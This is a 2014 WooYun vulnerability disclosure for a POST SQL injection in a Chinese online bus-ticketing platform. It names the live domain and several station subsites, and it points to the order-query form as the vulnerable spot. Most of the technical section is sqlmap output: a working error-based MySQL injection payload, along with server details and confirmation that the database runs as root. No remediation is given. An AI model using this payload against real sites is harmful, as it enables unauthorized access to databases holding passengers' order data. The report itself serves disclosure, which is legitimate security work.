漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-058560
漏洞标题:某通用型汽车网上售票平台POST注射(root权限)
相关厂商:远征电子科技开发有限公司
漏洞作者: 路人甲
提交时间:2014-04-29 10:53
修复时间:2014-06-13 10:54
公开时间:2014-06-13 10:54
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-04-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-06-13: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
某通用型汽车网上售票平台SQL注射(root权限)
详细说明:
地址:http://www.365tkt.com/
涉及站点如下:
以济宁汽车总站为例
地址:http://www.365tkt.com/jnzz/
订单查询处,输入如下
报错
判断存在post注入
Place: (custom) POST
Parameter: #2*
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: eport='and(select 1 from(select count(*),concat((select concat(CHAR
(52),CHAR(67),CHAR(117),CHAR(79),CHAR(78),CHAR(104),CHAR(75),CHAR(100),CHAR(117)
,CHAR(110),CHAR(55)) from information_schema.tables limit 0,1),floor(rand(0)) AN
D (SELECT 5664 FROM(SELECT COUNT(*),CONCAT(0x3a61736e3a,(SELECT (CASE WHEN (5664
=5664) THEN 1 ELSE 0 END)),0x3a7a7a713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHE
MA.CHARACTER_SETS GROUP BY x)a) AND (6182=61822))x from information_schema.table
s group by x)a)and'
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0
root权限
current user: 'root@localhost'
http://www.365tkt.com/tjxz/
http://www.365tkt.com/ytzz/
http://www.365tkt.com/dyzz/
站点很多,就不一一列举了
漏洞证明:
见上
修复方案:
Null
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝